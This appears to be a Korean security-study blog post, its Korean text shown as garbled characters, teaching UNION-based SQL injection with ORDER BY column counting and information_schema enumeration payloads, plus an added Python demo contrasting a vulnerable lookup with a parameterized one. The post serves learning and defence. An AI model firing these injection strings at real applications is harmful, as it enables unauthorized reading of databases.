
UNION SQL INJECTION

UNION SQL INJECTION attack

์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’ // SQL ์ฟผ๋ฆฌ๋ฅผ ๊ณต๊ฒฉ

 

UNION // UNION ALL

 

ex)

CREATE DATABASE test;

USE test;

CREATE TABLE user1 (idx int, id varchar(10));
INSERT INTO user1 VALUES (1,'admin');
INSERT INTO user1 VALUES (2,'Kim');
INSERT INTO user1 VALUES (3,'Park');

CREATE TABLE user2 (idx int, id varchar(10));
INSERT INTO user2 VALUES (1,'admin');
INSERT INTO user2 VALUES (2,'Lee');
INSERT INTO user2 VALUES (3,'Choi');

SQL ์ธ์ ์…˜ ๊ณต๊ฒฉ์„ ํ•  ๋•Œ ์ค‘๋ณต์ œ๊ฑฐ๋ฅผ ํ•˜๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒฝ์šฐ ์žˆ์„ ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ UNION(X) UNION ALL(์‚ฌ์šฉ)

UNION : ์ž๋™์œผ๋กœ ์ค‘๋ณต์„ ์ œ๊ฑฐ์‹œํ‚ค๋Š” ์—ญํ• 

UNION ALL : ์ค‘๋ณต ์ œ๊ฑฐ ์—†์ด ์ „๋ถ€ ํ•ฉ์ณ์„œ ์ถœ๋ ฅ

์ƒ์œ„ ์ปฌ๋Ÿผ ๊ฐฏ์ˆ˜์™€ ํ•˜์œ„ ์ปฌ๋Ÿผ ๊ฐฏ์ˆ˜๊ฐ€ ์ผ์น˜ํ•˜์ง€ ์•Š์•„ ์ƒ๊ธฐ๋Š” ERROR
์ค‘๋ณต ์ œ๊ฑฐ๊ฐ€ ๋˜์ง€ ์•Š๊ฒŒ UNION ALL ๊ผญ ์‚ฌ์šฉํ•˜๊ธฐ

1. ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์˜ ๋ฐ์ดํ„ฐ ํƒ€์ž…์€ ์ค‘๋ณต์ œ๊ฑฐ์™€ ์ปฌ๋Ÿผ ์ •๋ ฌ์ด ๋ถˆ๊ฐ€๋Šฅ ํ•˜๋‹ค

2. ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์˜ ๋ฐ์ดํ„ฐ ํƒ€์ž…์€ ์ •๋ ฌ์ด ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค > ๋‹จ, MySQL์€ ์ƒ๊ด€ํ•˜์ง€ ์•Š๋Š”๋‹ค.

 

UNION ๊ณต๊ฒฉ์„ ํ•˜๊ธฐ ์œ„ํ•ด ํ•„์š”ํ•œ ์ฒซ๋ฒˆ์งธ ์ •๋ณด : ์ปฌ๋Ÿผ์˜ ๊ฐœ์ˆ˜

UNION ๊ณต๊ฒฉ์„ ํ•˜๊ธฐ ์œ„ํ•œ ๋‘๋ฒˆ์งธ ์ •๋ณด : ๋Œ€์šฉ๋Ÿ‰ ๋ฐ์ดํ„ฐ ํƒ€์ž…์˜ ์œ ๋ฌด

 

ORDER BY 1 : sort by the first column in ascending order

ORDER BY 2 : sort by the second column in ascending order

ORDER BY 1000 : sort by the thousandth column in ascending order

 

ORDER BY 1 : (O) the first column exists

ORDER BY 2 : (O) the second column exists

...

ORDER BY 5 : (ERROR) the fifth column does not exist ?

> It may be a large-object data type and therefore unsortable.

So ORDER BY 6 : (O) is also possible, which is why at least 3 more should be checked

 

Confirm that the result sorts by idx
Confirm that the result sorts by title

 

SELECT * FROM table WHERE TITLE='[user input value]'

' UNION SELECT null,null,null,null,null,null,null #

' and 1=2 UNION SELECT null,null,null,null,null,null,null #

๊ฐ ์ˆซ์ž๋“ค์˜ ๋ฐ์ดํ„ฐ ์œ„์น˜๋ฅผ ํ™•์ธํ•˜๊ธฐ

' and 1=2 UNION SELECT '1','2','null','4','null','null','7' #

๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„, ์œ ์ € ์ด๋ฆ„, ๋ฒ„์ „ ํ™•์ธ ๊ฐ€๋Šฅ
๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”ํ•˜๊ธฐ

' and 1=2 UNION SELECT schema_name,'2',null,'4',null,null,'7' from information_schema.schemata #

' and 1=2 UNION SELECT table_name,'2',null,'4',null,null,'7' from information_schema.tables #

' and 1=2 UNION SELECT column_name,'2',null,'4',null,null,'7' from information_schema.columns WHERE table_name='character_sets' #
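Added example, not from the original post: the page's user1/user2 tables rebuilt in SQLite, a lookup that splices user input into the SQL text the way the TITLE='[user input value]' query does, the same lookup with a bound parameter, and the column-count ERROR described above. It assumes SQLite (line comment is `-- ` instead of MySQL's `#`); the table data is constructed from the page.

```python
import sqlite3

# Constructed in-memory copy of the page's user1/user2 tables (assumption:
# SQLite, so the trailing comment is "-- " rather than MySQL's "#").
SCHEMA = """
CREATE TABLE user1 (idx INTEGER, id VARCHAR(10));
INSERT INTO user1 VALUES (1,'admin'),(2,'Kim'),(3,'Park');
CREATE TABLE user2 (idx INTEGER, id VARCHAR(10));
INSERT INTO user2 VALUES (1,'admin'),(2,'Lee'),(3,'Choi');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, user_input):
    # The input is spliced into the SQL text: a quote closes the string
    # literal and everything after it is parsed as SQL, so a UNION ALL
    # appends rows from a table the query never meant to read.
    sql = "SELECT idx, id FROM user1 WHERE id='" + user_input + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_input):
    # Bound parameter: the value travels separately from the SQL text and is
    # compared literally, quotes and UNION included, so no row matches.
    return conn.execute("SELECT idx, id FROM user1 WHERE id=?", (user_input,)).fetchall()


def union_error(conn, user_input):
    # Returns the database error text when the injected SELECT has a column
    # count different from the original (the ERROR the notes describe), else None.
    try:
        lookup_vulnerable(conn, user_input)
        return None
    except sqlite3.OperationalError as e:
        return str(e)


UNION_PAYLOAD = "' AND 1=2 UNION ALL SELECT idx, id FROM user2 -- "  # 2 columns: matches
BAD_PAYLOAD = "' AND 1=2 UNION ALL SELECT idx FROM user2 -- "        # 1 column: ERROR

if __name__ == "__main__":
    db = connect()
    print(lookup_vulnerable(db, UNION_PAYLOAD))  # user2 rows leak through user1's query
    print(lookup_safe(db, UNION_PAYLOAD))        # []
    print(union_error(db, BAD_PAYLOAD))          # column-count mismatch message
```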
๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Blind Injection -1  (0) 2022.07.01
oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
SQL Injection  (0) 2022.06.29
2022-06-27  (0) 2022.06.28
2022-06-23  (0) 2022.06.28
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.